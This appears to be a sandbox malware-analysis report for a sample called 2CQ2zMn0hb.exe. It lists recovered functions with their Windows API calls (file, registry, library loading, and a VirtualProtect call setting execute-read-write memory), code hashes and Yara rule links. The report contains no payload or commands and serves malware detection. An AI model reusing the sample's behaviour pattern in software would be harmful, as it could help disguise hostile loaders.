Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69

Function 004031D6 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962

SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E

Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E

Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\2CQ2zMn0hb.exe,80000000,00000003), ref: 00405EE2
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15

Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D

Function 6F972AAC Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 6F972B6B

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 59c6d179ac90cf96214c03b7089d7217ac16e6100ef07b2c0c24f4ef190bcf13
Instruction ID: b00ffd9cf42ae5dc1a6d1f0bfc5c9f3689a3927b0b264f8fe72aeb6ac93b367c
Opcode Fuzzy Hash: 59c6d179ac90cf96214c03b7089d7217ac16e6100ef07b2c0c24f4ef190bcf13
Instruction Fuzzy Hash: 69418EB2928714DFEB74DF68D981B5937A8EB16328F20446AE5088A1C1DF34E8918F91

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E

Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E

Function 00406283 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634

Function 00405F61 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4

Function 00405F90 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004123B1,0040CED0,004033DE,0040CED0,004123B1,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8

Function 6F972993 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6F97505C,00000004,00000040,6F97504C), ref: 6F9729B1

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: cde6fd543cc16d0eb244f05092479c68d0a495c46ae4c9cfed04b452c818d378
Instruction ID: 79e1802133870088ee71a3ef427af58cfc8bbf9b108d9697b4de265db1aa70bf
Opcode Fuzzy Hash: cde6fd543cc16d0eb244f05092479c68d0a495c46ae4c9cfed04b452c818d378
Instruction Fuzzy Hash: 80F0A5F0908BA0DEFBE0CF2C8444B193BE0B74B724B14452AE24CD6281E734B464CF91

Function 00406255 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
